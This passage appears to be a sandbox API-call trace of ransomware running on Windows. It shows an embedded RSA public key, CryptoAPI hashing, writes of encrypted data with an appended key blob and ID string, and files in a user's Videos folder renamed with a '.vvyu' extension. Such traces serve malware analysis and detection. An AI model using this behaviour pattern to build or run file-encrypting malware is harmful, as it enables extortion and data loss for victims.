KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.632] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.632] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0198.633] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.633] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.633] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.634] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.634] GetLastError () returned 0x0 [0198.634] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.634] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0198.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.634] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.634] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.634] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x17610) returned 0x2af7168 [0198.635] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeacc8 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aead10 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.636] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6980 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6968 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0198.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.639] GetCurrentThreadId () returned 0x5d8 [0198.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5570 [0198.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.640] GetCurrentThreadId () returned 0x5d8 [0198.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6980 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69e0 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69f8 [0198.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6998 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6968 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aead10 | out: hHeap=0x2c0000) returned 1 [0198.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.652] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x1760d, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1760d, lpOverlapped=0x0) returned 1 [0198.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.654] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17612, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.654] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.656] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.656] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.656] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.656] CloseHandle (hObject=0x584) returned 1 [0198.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0198.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0198.659] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\CJrDuvoUsoi.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\cjrduvousoi.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\CJrDuvoUsoi.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\cjrduvousoi.swf.vvyu")) returned 1 [0198.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.660] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0198.663] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8114a30, ftCreationTime.dwHighDateTime=0x1d8a4de, ftLastAccessTime.dwLowDateTime=0x9eeee90, ftLastAccessTime.dwHighDateTime=0x1d8a5ef, ftLastWriteTime.dwLowDateTime=0x9eeee90, ftLastWriteTime.dwHighDateTime=0x1d8a5ef, nFileSizeHigh=0x0, nFileSizeLow=0x927f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kb5Yp2q.avi", cAlternateFileName="")) returned 1 [0198.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0198.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.663] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\Kb5Yp2q.avi") returned=".avi" [0198.664] CreateFileW 